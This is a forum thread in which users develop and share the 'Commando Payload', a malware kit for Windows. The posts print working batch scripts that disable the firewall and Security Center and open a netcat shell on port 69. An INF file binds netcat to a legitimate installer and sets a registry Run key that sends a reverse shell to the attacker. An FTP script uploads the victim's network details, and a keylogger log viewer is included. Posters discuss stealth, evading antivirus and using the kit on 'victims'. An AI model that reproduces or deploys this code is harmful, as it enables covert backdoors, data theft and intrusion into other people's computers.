sablefoxx Posted December 1, 2007 Share Posted December 1, 2007 This is in response to this thread: http://forums.hak5.org/index.php/topic,7971.0.html See Latest Post for v3.0 Beta / Java's Method v2 Current Stable Release 2.2 What it does: Gives you a reverse shell on a computer, it comes in two flavors my switchblade style attack, and Javabudd's exe bind method. Both have the same features. Sable's Method: Howto Use: Infect target computer with payload goto your computer connect to victims computer with a reverse shell :) nc.exe [host] [port] To connect use nc.exe from BiN or DL full version here - Netcat Commando Payload: [*] U3 / Non U3 Compatable [*] Copies NC.exe onto computer and runs it on port 69 [*] If autoexec.bat exists it will add itself into it [*] Completely Stealthed [*] Automatic Windows Firewall Kill and Security Center Disable [*] Uses hidec.exe Not nircmd.exe to Avoid Anti-Virus [*] Cleaner.bat to remove payload *See below for updated code* [*] Removes Windows Firewall from Ctrl Panel (requires reboot) [*] Autoruns at Startup Using a Regkey - (thx to Javabudd) [*] Added -t So you can telnet to victim - (thx to Javabudd) [*] Ctrl+Alt+Del Resistant - (thx to Javabudd) Upcoming Addons: [*] Bypass NAT (see Java's Method v2) [*] U3 Vista Port (coming soon to Cmdo v3) Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions. Javabudd's Method Binds nc.exe and some script to a legit installer (magicISO), so when you run the installer it not only installs magicISO but the payload as well. ------------------------------------------------------------------------------------------------------------------------------------------------------ Download Commando Payload Here (SiZE:81Kb - File:RAR - NonU3) Commando Payload 2.2 Download Commando Payload Here (SiZE:151Kb - File:ISO - U3) Commando Payload 2.2 Download Java's Method Here (SiZE:3Mb - File:EXE - WinXP/Vista) Java's Method v1.0 ================================================================================ === Feel Free to Add/Mod/Hack this code all you want! -- MAD Props to javabudd, v2 kicks ass Quote Link to comment Share on other sites More sharing options...
Xqtftqx Posted December 1, 2007 Share Posted December 1, 2007 Holy Shit, nice dude i did one with netcat last night it just runs it. this is awsome. Mad Props Dude. this is defenly going in my payload. Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 1, 2007 Author Share Posted December 1, 2007 Ok, updated the payload, should auto disable windows' firewall, kill security center, and add nc.exe to exceptions list incase they turn the firewall back on. Let me know if there are problems, as i didnt get a good chance to test everything. Any ideas on howto bypass NAT? --Maybe auto join a VPN? Quote Link to comment Share on other sites More sharing options...
javabudd Posted December 1, 2007 Share Posted December 1, 2007 Ive got a perfect iexpress installer that i made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it. And im also trying to add something that adds a registry key to HKLM/microsoft/windows/currenversion/run, anything in that key is run on startup with no questions asked and run perfectely stealthed :D Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 1, 2007 Author Share Posted December 1, 2007 Ive got a perfect iexpress installer that i made that throws NC into %sys32% and with the switches -L and -d netcat stays open even if they ctrl alt del it. And im also trying to add something that adds a registry key to HKLM/microsoft/windows/currenversion/run, anything in that key is run on startup with no questions asked and run perfectely stealthed :D Hot! Send me teh code when its done! Quote Link to comment Share on other sites More sharing options...
javabudd Posted December 1, 2007 Share Posted December 1, 2007 **Edit** I changed the cabinet installer to put a directory in the windows folder named Attreb. Inside this folder is nc and all that shit the only problem im having right now is adding this key to the registry so it auto runs nc -L -d -p 69 -e cmd.exe. Im using INF files, anyone have any ideas? Quote Link to comment Share on other sites More sharing options...
javabudd Posted December 2, 2007 Share Posted December 2, 2007 I got this installer perfected. Heres the link http://www.mediafire.com/?5i1ljjy9xcj. In the RAR is the fake MagicISO installer and the INF file i made. Read through the INF then you will understand what happens when you execute the installer. Very Happy Very Happy Happy Hacking ! Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 2, 2007 Author Share Posted December 2, 2007 Updated payload to V2, look at above post for details!! Here is the cleaner.bat code to remove the payload v2.2: @echo off cls taskkill /f /im nc.exe cd C:WINDOWSsystem32 del /f /q start.bat del /f /q stop.bat del /f /q hidec.exe del /f /q nc.exe reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v Attreb /f reg delete "HKCUControl Paneldon't load" /v Firewall.cpl /f msg * "system clean" exit Quote Link to comment Share on other sites More sharing options...
javabudd Posted December 2, 2007 Share Posted December 2, 2007 shout out to sable and his switchblade :D. If anyone has any ideas on what we should add let us know and we will try and implement them...commando payload v2 = GG Quote Link to comment Share on other sites More sharing options...
underhole Posted December 2, 2007 Share Posted December 2, 2007 Tested it to day, it works like magic. Another great payload from Sable Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 3, 2007 Author Share Posted December 3, 2007 Cmdo Payload v3.0 Development Current State of Commando Payload 3.0 Beta: [*] U3 / Non U3 Compatable [*] Completely Stealthed [*] Keylogger with Real Time Feed Back (rtk.bat) *New, Works but Buggy* [*] Runs Reverse Shell on Port 69 [*] Easy to Use Connect to Victim Script *New* [*] Automatic Windows Firewall Kill and Security Center Disable *Fixed* [*] Uses hidec.exe Not nircmd.exe to Avoid Anti-Virus [*] Cleaner.bat to remove payload *Updated for v3.0* [*] Removes Windows Firewall from Ctrl Panel *Fixed* [*] Autoruns at Startup Using a Regkey *Not Working Need Fix* [*] Commented Code *New* [*] Records IPconfig to txt in Logs dir *New* [*] Won't Run if C:safety.txt exists *New* [*] NAT Traversal, Connect Through Routers *New, Only Works in Java's Method so far* [*] Added -t So you can telnet to victim --Everything is Almost working but before it gets release as the main payload i would like some people to test it, through me some ideas on other things to add, and review my code and fix it, hehe.---Codez--- Magik.bat - Script That Installs Payload:0 @echo off cls :: Test for safty.txt IF EXIST C:safty.txt goto exit :: Test to see if payload is alrdy installed IF EXIST C:WINDOWSsystem32nc.exe goto exit :: Test to see if ther is a logs dir (Non-U3 only) IF NOT EXIST Logs goto mklog :1 :: Reg1 = Startup Key :: Reg2 = Disables Firewall in Ctrl Panel reg import "reg1.reg" reg import "reg2.reg" :: First poke a hole in window's firewall so that it will allow nc.exe hidec /w stop.bat :: Move files to location and run xcopy /y /s .BiN %systemroot%system32 :: Make log (Non-U3 Only) ipconfig /all>>.Logs%computername%.txt :: Start Payload cd C:WINDOWSsystem32 start k.exe hidec nc.exe -l -t -p 69 -d -e cmd.exe goto exit :mklog mkdir Logs goto 1 :exit exit connect.bat - Easy Way to Connect to Victim, for the people out there who dont know what "nc.exe [host] [port]" means. :setup @echo off cls title Auto-NConnect IF NOT EXIST nc.exe goto error IF NOT EXIST makefile goto error goto 1 :1 echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Welcome to SableFoXx's º echo º Auto-NConnect º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. set /p target= Input IP of Target: echo. set /p port= Input Port (defualt 69): cls title Reverse Shell Open goto connect :connect nc.exe %target% %port% :error cls color c echo BAD BLAK MAGiC, TRY AGAiN pause exit stop.bat - stops windows firewall and security center @echo off cls net stop "security center" net stop "Windows Firewall/Internet Connection Sharing (ICS)" exit Real Time Keylogger View (Still Buggy) Usage of rtk.bat: Connect to host, goto %systemroot%system32 and start rtk.bat, basically displays keylogger's log file and refreshes it. Working on a .html version that should work better then current one. rtk.bat:@echo off :1 :: clear screen cls :: display text in log type C:WINDOWSsystem32log.txt :: pause before refresh REM ******PAUSE****** set wait=0 :pause1 set /a wait=%wait%+1 if %wait% neq 250 goto :pause1 REM ***************** :: repeat/refresh goto 1 Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions. ------------------------------------------------------------------------------------------------------------------------------------------------------Download Commando Payload Here (SiZE:175Kb - File:RAR - NonU3)Commando Payload 3.0 - Beta ================================================================================ === Please Post Code Fixes, New Ideas, and Anything on Your Mind Quote Link to comment Share on other sites More sharing options...
javabudd Posted December 4, 2007 Share Posted December 4, 2007 HEY sable you're gonna like this one. I finally was able to incorporate a method to send their IP information. I created a few proggys to ipconfig /all the comp and create a text file ipaddr.txt in the sys32 directory. The other progy automatically connects to my ftp (No username or password needed because its already in the script :D) and uploads ipaddr.txt. This whole process takes about 1.3 seconds. Talk to me on aim if u want the code, i cant give it away here cuz it has my ftp info :/ Oh btw, you can scratch get External IP from upcoming additions :D Quote Link to comment Share on other sites More sharing options...
javabudd Posted December 4, 2007 Share Posted December 4, 2007 Java v2.0 Current Progress on Java Installer Payload v2.0 [li]Completely Stealthed[/li] [li]Bound to aim.exe (or any .exe installer you like)[/li] [li]Reverse shell on port 69[/li] [li]WORKS EVEN IF VICTIM HAS A ROUTER[/li] [li]Implements an ipconfig /all > %computername%.txt[/li] [li]Uploads "%computername%.txt to an FTP server (I am going to include the code but with my FTP info taken out)[/li] [li]Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)[/li] [li]WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN[/li] [li]And last but hopefully not the least, Anti virus does not pickup any of it. :D:D[/li] Teh Codez jvabd.bat: @echo off :: Executing IPCONFIG and creating .txt ipconfig /all > c:WindowsSystem32%Computername%.txt cls :: Executing Script to send ipaddr to ftp :D CALL .hidden.vbs script.bat :: Quitting GOTO End :End hidden.vbs CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False script.bat MAKE SURE YOU EDIT THE NECESSARY FIELDS @ECHO OFF :: Create the temporary script file > script.ftp ECHO USER YOURUSERNAME >>script.ftp ECHO PASSWORD >>script.ftp ECHO binary >>script.ftp ECHO prompt n >>script.ftp ECHO put "C:WindowsSystem32%computername%.txt" >>script.ftp ECHO QUIT ::Connect to the ftp and run the script FTP -v -s:script.ftp FTPSERVER :: Overwriting the temp script so this never happened :D TYPE NUL >script.ftp DEL script.ftp EXIT Setup.inf MAKE SURE YOU EDIT THE NECESSARY FIELDS ; This INF File will install netcat in the TARGET system32 directory and implement the following command ; "nc.exe -e cmd.exe 0.0.0.0 69";where 0.0.0.0 is YOUR EXTERNAL ip address ; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69 ; any time you create a listen server on your computer ; Lets Begin: [Version] Signature="$Chicago$" AdvancedINF=2.0 [DefaultInstall] Copyfiles=install.files Copyfiles=installer.files RunPostSetupCommands=RunPostSetupCommandsSection AddReg=Add.Settings [DestinationDirs] ; If you are using a different .exe installer switch the directory HERE install.files=30,/Windows/System32 installer.files=30,/Program Files/AOL Instant Messenger [install.files] ; These are the pwnage programs that will be installed into system32 jvabd.bat;ipconfig /all txt creator script.bat;autoconnect to ftp and upload ipconfig txt :D nc.exe; netcat of course: nircmd.exe;hides cmd window hidden.vbs; hides cmd window while executing a batch in a batch setup.inf;inf file [installer.files] ; The aim installer that installs into /program files/aol instant messenger;) ; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE aim.exe [Add.Settings] ; Adding registry key to make nc run on boot :D ; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D HKLM,SoftwareMicrosoftWindowsCurrentVersionRun,WinUpdate, 0x00000000, "C:WindowsSystem32nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69" [RunPostSetupCommandsSection] ; Programs are going to be listed in order of execution, including parameters (nc :D): ; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP ; If you have a different .exe installer replace aim.exe with your.exe once again nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69 nircmd.exe execmd CALL jvabd.bat aim.exe [SourceDiskNames] 1="default",,1 [br] Instructions on creating the installer [br] Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf its time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Dont worry when you run the compiled version only the installer is shown, everything else gets stealth installed. Now, when you have these 7 things inside a folder its time to compile them into one. *Note* I have not found a method of doing this on linux or mac yet, being as they dont use .exe's" Click start - run - iexpress.exe. Choose "create new..." then click on "Extract files then run an installation command" Create a package title (i did AIM 5.9.8) )then decide whether or not u want a confirmation message (This will install blah blah, are you sure?) Next skip the license crap and you will see "Package Files". Click add, browse to your folder with the pwnage in it, and add all 7 items (including your.exe installer). Click next, on the next screen under "Install Program" choose SETUP.INF not YOUR.EXE INSTALLER and leave the post install command. Click next, leave the show window setting at recommended, click next, create a finished message if you like. Click next, name your installer.exe and choose the place you want to save it, also check the "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click next, create the package, and you now have a legit installer that includes pwange :D. **IF YOU USE THIS AND GET FUCKED ITS NOT MY FAULT** Quote Link to comment Share on other sites More sharing options...
javabudd Posted November 19, 2009 Share Posted November 19, 2009 wow sable im so glad this forum is still up!! I formatted my comp and forgot to backup all this shit but thankfully its here. <3 Quote Link to comment Share on other sites More sharing options...
Jen Posted November 19, 2009 Share Posted November 19, 2009 Can someone give me a more clear explanation in noob terms on what this does? Quote Link to comment Share on other sites More sharing options...
Jen Posted March 3, 2010 Share Posted March 3, 2010 Hey sablefox, do you still work on this project? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted March 3, 2010 Author Share Posted March 3, 2010 (edited) As it just so happens, me and Javabudd recently resumed working on that project; Nothing to release just yet, but here are a few features of the new version: -Gui Interface (command line as well) -Silent install option -Auto Bypass Router -Emails External IP/Info -Customize each install using GUI -Built in tools (such as wget) -Option to install FTP server -Even more As always when its done I'll post all the source for everyone to play around with. :) Edited March 3, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
Jen Posted March 3, 2010 Share Posted March 3, 2010 Wow, looks great!! Any updates on virus undetection? Like making the tool FUD? and u3 too? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted March 3, 2010 Author Share Posted March 3, 2010 Could do a U3 version easily, been mulling over compiling my own version of NetCat to attempt avoiding AV detection, or even possibly coding my own in Python... not sure just yet, all in due time methinks. Quote Link to comment Share on other sites More sharing options...
Jen Posted March 3, 2010 Share Posted March 3, 2010 Okk, thanks a lot! Will you be finished before April 1st?? Cause i'm going to test things during spring break :P Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted March 19, 2010 Author Share Posted March 19, 2010 Okk, thanks a lot! Will you be finished before April 1st?? Cause i'm going to test things during spring break :P I will see if I can get something together by then, however I regret to inform everyone there has been a slight set back... I have obtained a Starcraft 2 Beta Key... :) Quote Link to comment Share on other sites More sharing options...
Jen Posted March 19, 2010 Share Posted March 19, 2010 I will see if I can get something together by then, however I regret to inform everyone there has been a slight set back... I have obtained a Starcraft 2 Beta Key... :) Haha, okay. I understand :) Quote Link to comment Share on other sites More sharing options...
X3N Posted March 19, 2010 Share Posted March 19, 2010 i been away for a while but i wouldn't mind getting back into developing new and improved switchblades... let me know if theres anything in particular that i can do to help... otherwise ill just start hackin Quote Link to comment Share on other sites More sharing options...
thedadymac Posted March 21, 2010 Share Posted March 21, 2010 hi I was wondering what i would have to change in the code to allow me to connect to the "victim" over the internet instead of over a LAN Quote Link to comment Share on other sites More sharing options...
Jen Posted March 21, 2010 Share Posted March 21, 2010 I think it does allow you to connect over internet, as long as they dont' have a router Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.